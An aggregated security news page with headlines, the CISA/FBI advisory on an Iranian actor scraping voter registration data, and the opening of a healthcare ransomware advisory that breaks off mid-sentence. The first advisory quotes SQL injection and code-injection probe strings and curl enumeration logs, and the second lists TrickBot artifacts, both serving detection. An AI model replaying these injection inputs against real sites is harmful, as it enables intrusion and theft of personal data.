Cybersecurity Updates

Cisco Updates


Source: Threat Post

2021 Healthcare Cybersecurity Priorities: Experts Weigh In
Hackers are putting a bullseye on healthcare. Experts explore why hospitals are being singled out and what any company can do to better protect themselves.

TurkeyBombing Puts New Twist on Zoom Abuse
Threat actors already stole nearly 4,000 credentials before the holiday was even over, according to report.

Cybersecurity Predictions for 2021: Robot Overlords No, Connected Car Hacks Yes
While 2021 will present evolving threats and new challenges, it will also offer new tools and technologies that will we hope shift the balance towards the defense.

ThreatList: Cyber Monday Looms – But Shoppers Oblivious to Top Retail Threats
Online shoppers are blissfully unaware of credit card skimming threats and malicious shopping apps as they head into this year's Black Friday and Cyber Monday holiday shopping events.

Federated Learning: A Therapeutic for what Ails Digital Health
Researchers show the promise of Federated Learning to protect patient privacy and improve healthcare outcomes across the world.

Changing Employee Security Behavior Takes More Than Simple Awareness
Designing a behavioral change program requires an audit of existing security practices and where the sticking points are.

Major BEC Phishing Ring Cracked Open with 3 Arrests
Some 50,000 targeted victims have been identified so far in a massive, global scam enterprise that involves 26 different malwares.

Critical MobileIron RCE Flaw Under Active Attack
Attackers are targeting the critical remote code-execution flaw to compromise systems in the healthcare, local government, logistics and legal sectors, among others.

How to Update Your Remote Access Policy – And Why You Should Now
Reducing the risks of remote work starts with updating the access policies of yesterday.

Laser-Based Hacking from Afar Goes Beyond Amazon Alexa
The team that hacked Amazon Echo and other smart speakers using a laser pointer continue to investigate why MEMS microphones respond to sound.



Source: Wired.com

It’s Time to Stop Sharing Your Passwords With Your Partner
Go ahead, give them the keys to your heart—but anything more could make a cybersecurity mess.

Trump’s Election Attack Ends December 14—Whether He Knows It or Not
Despite the Trump campaign’s fight to overturn the election, the wheels of American democracy keep turning.

This Bluetooth Attack Can Steal a Tesla Model X in Minutes
The company is rolling out a patch for the vulnerabilities, which allowed one researcher to break into a car in 90 seconds and drive away.

Google Is Testing End-to-End Encryption in Android Messages
For now, the security measure will be available only to people using the beta version of the app.

Secret Service Investigates 700 Cases of Covid Relief Fraud
Ransomware as a service, exposed SMS photos, and more of the week's top security news.

A Facebook Messenger Flaw Could Have Let Hackers Listen In
The vulnerability was found through the company's bug bounty program, now in its tenth year.

Ghostery’s Making a Privacy Browser—and Ad-Free Search Engine
The tracker-blocking company will soon launch a privacy-friendly desktop browser as well.

Telegram Still Hasn’t Removed an AI Bot That’s Abusing Women
A deepfake bot has been generating explicit, non-consensual images on the platform. The researchers who found it say their warnings have been ignored.

Firing Christopher Krebs Crosses a Line—Even for Trump
The president dismissed the widely respected cybersecurity agency director Tuesday night for pushing back against election disinformation.

Forget Impostors. Among Us Is a Playground for Hackers
The blockbuster game of deception has security holes that let cheaters run wild.

Microsoft's Making a Secure PC Chip—With Intel and AMD's Help
The Pluton security processor will give the software giant an even more prominent role in locking down Windows hardware.

Donald Trump Could Still Launch Nuclear Weapons at Any Time
The president's responsibility for the US nuclear arsenal is a Cold War anachronism. The Trump era shows why it needs reform.

7 Simple Tech Tips to Keep Your Family Safe This Holiday
Does your great-aunt Winifred ask for tech support every year? Even if you aren't traveling this year, send your loved ones this advice to show you care.

A Ransomware Gang Bought Facebook Ads to Troll Its Victim
Covid-19 research hacking, the Pentagon's Photoshop antics, and more of the week's top security news.

The OS Big Sur Launch Might Have Slowed Down Macs Everywhere
The issues affected users who didn't upgrade their software, and other Apple services too.

The iOS Covid App Ecosystem Has Become a Privacy Minefield
An analysis of nearly 500 Covid-related apps worldwide shows major differences in how much data they expect you to give up.

The Scammer Who Wanted to Save His Country
Last year, a hacker gave Glenn Greenwald a trove of damning messages between Brazil’s leaders. Some suspected the Russians. The truth was far less boring.

The GOP Keeps Proving There's No Election Fraud
Through numerous legal and other challenges, the Trump campaign and its allies have consistently undermined their argument.

An Engineer Gets 9 Years for Stealing $10M From Microsoft
The defendant tried—and failed—to use bitcoin to cover his tracks.

WhatsApp Using Up Your Phone Storage? Here’s How to Fix It
It's time to do something about those photos and videos automatically saving to your camera roll.



Source: US-Cert

AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data
Original release date: October 30, 2020 | Last revised: November 3, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 8 framework. See the <a href="https://attack.mitre.org/versions/v8/techniques/enterprise/">ATT&amp;CK for Enterprise version 8</a> for all referenced threat actor techniques.</em></p> <p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for&nbsp;the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. <fn value="1">This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security. </fn>&nbsp;(Reference FBI FLASH message <a href="https://www.ic3.gov/Media/News/2020/201030.pdf">ME-000138-TT</a>, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.</p> <p>Click <a href="https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A-Iranian_Advanced_Persistent_Threat_Actor_Identified_Obtaining_Voter_Registration_Data.pdf">here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><p>Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (<em>Active Scanning: Vulnerability Scanning</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1595/002/">T1595.002</a>]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior.&nbsp;</p> <p>Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (<em>Exploit Public-Facing Application</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1190/">T1190</a>]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites.&nbsp;</p> <p>CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video.&nbsp;</p> <p>CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (<em>Compromise Infrastructure</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1584/">T1584</a>]) within a similar timeframe, use of IP addresses and IP ranges<span style="font-size:11.0pt"><span style="line-height:115%"><span style="font-family:&quot;Arial&quot;,sans-serif">—</span></span></span>including numerous virtual private network (VPN) service exit nodes—which correlate to this Iran APT actor (<em>Gather Victim Host Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1592/">T1592</a>)]), and other investigative information.&nbsp;</p> <h2>Reconnaissance</h2> <p>The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (<em>Search Open Websites and Domains</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1593">T1593</a>]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites.&nbsp;</p> <p>The FBI also has information indicating the actor researched &nbsp;the following information in a suspected attempt to further their efforts to survey and exploit state election websites.</p> <ul> <li>YOURLS exploit</li> <li>Bypassing ModSecurity Web Application Firewall</li> <li>Detecting Web Application Firewalls</li> <li>SQLmap tool</li> </ul> <h3>Acunetix Scanning</h3> <p>CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (<em>Active Scanning: Vulnerability Scanning</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1595/002/">T1595.002</a>]).&nbsp;</p> <p>The actor used the scanner to attempt SQL injection into various fields in <code>/registration/registration/details</code> with status codes 404 or 500.</p> <p><code>/registration/registration/details?addresscity=-1 or 3*2&lt;(0+5+513-513) -- &amp;addressstreet1=xxxxx&amp;btnbeginregistration=begin voter registration&amp;btnnextelectionworkerinfo=next&amp;btnnextpersonalinfo=next&amp;btnnextresdetails=next&amp;btnnextvoterinformation=next&amp;btnsubmit=submit&amp;chkageverno=on&amp;chkageveryes=on&amp;chkcitizenno=on&amp;chkcitizenyes=on&amp;chkdisabledvoter=on&amp;chkelectionworker=on&amp;chkresprivate=1&amp;chkstatecancel=on&amp;dlnumber=1&amp;dob=xxxx/x/x&amp;email=sample@email.tst&amp;firstname=xxxxx&amp;gender=radio&amp;hdnaddresscity=&amp;hdngender=&amp;last4ssn=xxxxx&amp;lastname=xxxxxinjjeuee&amp;mailaddresscountry=sample@xxx.xxx&amp;mailaddressline1=sample@email.tst&amp;mailaddressline2=sample@xxx.xxx&amp;mailaddressline3=sample@xxx.xxx&amp;mailaddressstate=aa&amp;mailaddresszip=sample@xxxx.xxx&amp;mailaddresszipex=sample@xxx.xxx&amp;middlename=xxxxx&amp;overseas=1&amp;partycode=a&amp;phoneno1=xxx-xxx-xxxx&amp;phoneno2=xxx-xxx-xxxx&amp;radio=consent&amp;statecancelcity=xxxxxxx&amp;statecancelcountry=usa&amp;statecancelstate=XXaa&amp;statecancelzip=xxxxx&amp;statecancelzipext=xxxxx&amp;suffixname=esq&amp;txtmailaddresscity=sample@xxx.xxx</code></p> <h3>Requests</h3> <p>The actor used the following requests associated with this scanning activity.</p> <p><code>2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0</code></p> <p><code>2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 1375</code></p> <p><code>2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - X.X.x.x&nbsp;</code></p> <h3>User Agents Observed</h3> <p>CISA and FBI have observed the following user agents associated with this scanning activity.</p> <p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0&nbsp;</code></p> <p><code>Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4&nbsp;</code></p> <p><code>Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17</code></p> <h2>Exfiltration</h2> <h3>Obtaining Voter Registration Data</h3> <p>Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success [<em>Gather Victim Identity Information</em> (<a href="https://attack.mitre.org/versions/v8/techniques/T1593/">T1589</a>)]. A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.<br /> Requests</p> <p>The actor used the following requests.</p> <p><code>2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 - x.x.x.x curl/7.55.1 - 200 0 0 1406</code></p> <p><code>2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390</code></p> <p><code>2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 - x.x.x.x curl/7.55.1 - 200 0 0 1625</code></p> <p><code>2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390</code></p> <p>Note: incrementing <code>voterid </code>values in <code>cs_uri_query field</code></p> <h3>User Agents</h3> <p>CISA and FBI have observed the following user agents.</p> <p><code>FDM+3.x</code></p> <p><code>curl/7.55.1</code></p> <p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0&nbsp;<br /> Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p> <p>See figure 1 below for a timeline of the actor’s malicious activity.</p> <p><img alt="" data-entity-type="file" data-entity-uuid="b752a4ee-19a8-4f25-824d-d036cf917f5c" height="240" src="https://us-cert.cisa.gov/sites/default/files/2020-10/Technical%20Findings.png" width="817" /></p> <p class="text-align-center"><em>Figure 1: Overview of malicious activity</em></p> <h3>Mitigations</h3><h2>Detection</h2> <h3>Acunetix Scanning</h3> <p>Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.</p> <ul> <li><code>$acunetix</code></li> <li><code>acunetix_wvs_security_test</code></li> </ul> <h3>Indicators of Compromise</h3> <p>For a downloadable copy of IOCs, see <a href="https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A.stix.xml">AA20-304A.stix</a>.</p> <p><strong>Disclaimer:</strong> <em>many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. This creates the potential for a significant number of false positives; only activity listed in this advisory warrants further investigation. The actor likely uses various IP addresses and VPN services.</em></p> <p>The following IPs have been associated with this activity.</p> <ul> <li>102.129.239[.]185 (Acunetix Scanning)</li> <li>143.244.38[.]60 (Acunetix Scanning and cURL requests)</li> <li>45.139.49[.]228 (Acunetix Scanning)</li> <li>156.146.54[.]90 (Acunetix Scanning)</li> <li>109.202.111[.]236 (cURL requests)</li> <li>185.77.248[.]17 (cURL requests)</li> <li>217.138.211[.]249 (cURL requests)</li> <li>217.146.82[.]207 (cURL requests)</li> <li>37.235.103[.]85 (cURL requests)</li> <li>37.235.98[.]64 (cURL requests)</li> <li>70.32.5[.]96 (cURL requests)</li> <li>70.32.6[.]20 (cURL requests)</li> <li>70.32.6[.]8 (cURL requests)</li> <li>70.32.6[.]97 (cURL requests)</li> <li>70.32.6[.]98 (cURL requests)</li> <li>77.243.191[.]21 (cURL requests and FDM+3.x [Free Download Manager v3] enumeration/iteration)</li> <li>92.223.89[.]73 (cURL requests)</li> </ul> <p>CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.</p> <ul> <li>195.181.170[.]244 (Observed September 30 and October 20, 2020)</li> <li>102.129.239[.]185 (Observed September 30, 2020)</li> <li>104.206.13[.]27 (Observed September 30, 2020)</li> <li>154.16.93[.]125 (Observed September 30, 2020)</li> <li>185.191.207[.]169 (Observed September 30, 2020)</li> <li>185.191.207[.]52 (Observed September 30, 2020)</li> <li>194.127.172[.]98 (Observed September 30, 2020)</li> <li>194.35.233[.]83 (Observed September 30, 2020)</li> <li>198.147.23[.]147 (Observed September 30, 2020)</li> <li>198.16.66[.]139(Observed September 30, 2020)</li> <li>212.102.45[.]3 (Observed September 30, 2020)</li> <li>212.102.45[.]58 (Observed September 30, 2020)</li> <li>31.168.98[.]73 (Observed September 30, 2020)</li> <li>37.120.204[.]156 (Observed September 30, 2020)</li> <li>5.160.253[.]50 (Observed September 30, 2020)</li> <li>5.253.204[.]74 (Observed September 30, 2020)</li> <li>64.44.81[.]68 (Observed September 30, 2020)</li> <li>84.17.45[.]218 (Observed September 30, 2020)</li> <li>89.187.182[.]106 (Observed September 30, 2020)</li> <li>89.187.182[.]111 (Observed September 30, 2020)</li> <li>89.34.98[.]114 (Observed September 30, 2020)</li> <li>89.44.201[.]211 (Observed September 30, 2020)</li> </ul> <h2>Recommendations</h2> <p>The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors:&nbsp;</p> <ul> <li>Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.</li> <li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li> <li>Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.</li> <li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li> <li>Apply multi-factor authentication, when possible.</li> <li>Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.</li> <li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.</li> <li>When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.</li> <li>Ensure third parties that require RDP access follow internal remote access policies.</li> <li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li> <li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as a VPNs. However, recognize the security of VPNs matches the security of the connected devices.</li> <li>Use security features provided by social media platforms; use <a href="https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords">strong passwords</a>, change passwords frequently, and use a different password for each social media account.&nbsp;</li> <li>See CISA’s Tip on <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Best Practices for Securing Election Systems</a> for more information.&nbsp;</li> </ul> <h3>General Mitigations</h3> <p><em><strong>Keep applications and systems updated and patched</strong></em></p> <p>Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed of threat actors to create new exploits following the release of &nbsp;a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. <fn value="2">NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Additionally, use tools (e.g., the OWASP Dependency-Check Project tool <fn value="3">https://owasp.org/www-project-dependency-check/</fn>) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.</p> <p><em><strong>Scan web applications for SQL injection and other common web vulnerabilities</strong></em></p> <p>Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. <fn value="4">https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm</fn> Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.</p> <p><em><strong>Deploy a web application firewall &nbsp;</strong></em></p> <p>Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.&nbsp;</p> <p><em><strong>Deploy techniques to protect against web shells</strong></em></p> <p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. <fn value="5">NSA &amp; ASD "CyberSecurity Information: Detect and Prevent Web Shell Malware" https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF</fn> Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.&nbsp;</p> <p><em><strong>Use multi-factor authentication for administrator accounts</strong></em></p> <p>Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. <fn value="6">https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs</fn> Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). <fn value="7">NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p> <p><em><strong>Remediate critical web application security risks</strong></em></p> <p>First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications. <fn value="8">NSA “Building Web Applications – Security for Developers” https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm</fn>&nbsp;<fn value="9">https://owasp.org/www-project-top-ten/</fn> <fn value="10">https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</fn></p> <h2>How do I respond to unauthorized access to election-related systems?</h2> <h3>Implement your security incident response and business continuity plan</h3> <p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p> <h3>Contact CISA or law enforcement immediately&nbsp;</h3> <p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href="https://us-cert.cisa.govmailto:Central@cisa.gov">Central@cisa.gov</a> or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (<a href="https://us-cert.cisa.govmailto:CyWatch@ic.fbi.gov">CyWatch@ic.fbi.gov</a> or 855-292-3937).</p> <h2>Resources</h2> <ul> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Best Practices for Securing Election Systems</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST16-001">Securing Voter Registration Data&nbsp;</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST18-006">Website Security&nbsp;</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">Avoiding Social Engineering and Phishing Attacks</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">Securing Network Infrastructure Devices</a>&nbsp;</li> <li>Joint Advisory: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li>CISA Insights: <a href="https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf">Actions to Counter Email-Based Attacks on Election-related Entities</a>&nbsp;</li> <li>FBI and CISA Public Service Announcement (PSA): <a href="https://ic3.gov/Media/Y2020/PSA201002">Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA201001">Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a>&nbsp;</li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200930">Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a>&nbsp;</li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200928">False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200924">Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a>&nbsp;</li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200922">Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Result</a></li> </ul> <p>&nbsp;</p> <h3>Revisions</h3> <ul> <li>October 30, 2020: Initial Version</li> <li>November 3, 2020: Updated IOC disclaimer to emphasize that only activity listed in this alert warrants further investigation.</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector
Original release date: October 28, 2020 | Last revised: November 2, 2020<br/><h3>Summary</h3><p><strong><em>This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection.</em></strong></p> <p class="tip-intro" style="font-size: 15px;"><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p> <p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health&nbsp;(HPH) Sector&nbsp;to infect systems with ransomware, notably Ryuk and Conti, for financial gain.</p> <p>CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf">Click here</a> for a PDF version of this report.</p> <h4>Key Findings</h4> <ul> <li>CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.</li> <li>These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.</li> </ul> <h3>Technical Details</h3><h3>Threat Details</h3> <p>The cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders—like TrickBot and BazarLoader (or BazarBackdoor)—as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim’s machine.</p> <h4>TrickBot</h4> <p>What began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.</p> <p>In early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created <code>anchor_dns</code>, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.</p> <p><code>anchor_dns</code> is a backdoor that allows victim machines to communicate with C2&nbsp;servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. <code>anchor_dns</code> uses a single-byte <code>XOR</code> cipher to encrypt its communications, which have been observed using key <code>0xB9</code>. Once decrypted, the string <code>anchor_dns</code> can be found in the DNS request traffic.</p> <h4>TrickBot Indicators of Compromise</h4> <p>After successful execution of the malware, TrickBot copies itself as an executable file with a 12-character&nbsp;randomly generated file name (e.g. <code>mfjdieks.exe</code>) and places this file in one of the following directories.</p> <ul> <li>C:\Windows\</li> <li>C:\Windows\SysWOW64\</li> <li>C:\Users\[Username]\AppData\Roaming\</li> </ul> <p>Once the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32 or 64 bit instruction set), to the infected host’s <code>%APPDATA%</code> or <code>%PROGRAMDATA%</code> directory, such as <code>%AppData\Roaming\winapp</code>. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., <code>importDll32</code> or <code>importDll64</code>):</p> <ul> <li><code>Systeminfo</code></li> <li><code>importDll</code></li> <li><code>outlookDll</code></li> <li><code>injectDll </code>with a directory (ex. <code>injectDLL64_configs</code>) containing configuration files: <ul> <li><code>dinj</code></li> <li><code>sinj</code></li> <li><code>dpost</code></li> </ul> </li> <li><code>mailsearcher</code> with a directory (ex. <code>mailsearcher64_configs</code>) containing configuration file: <ul> <li><code>mailconf</code></li> </ul> </li> <li><code>networkDll</code> with a directory (ex. networkDll64_configs) containing configuration file: <ul> <li><code>dpost</code></li> </ul> </li> <li><code>wormDll</code></li> <li><code>tabDll</code></li> <li><code>shareDll</code></li> </ul> <p>Filename <code>client_id</code> or <code>data </code>or <code>FAQ </code>with the assigned bot ID of the compromised system is created in the malware directory. Filename <code>group_tag</code> or <code>Readme.md</code> containing the TrickBot campaign IDs is created in the malware directory.</p> <p>The malware may also drop a file named 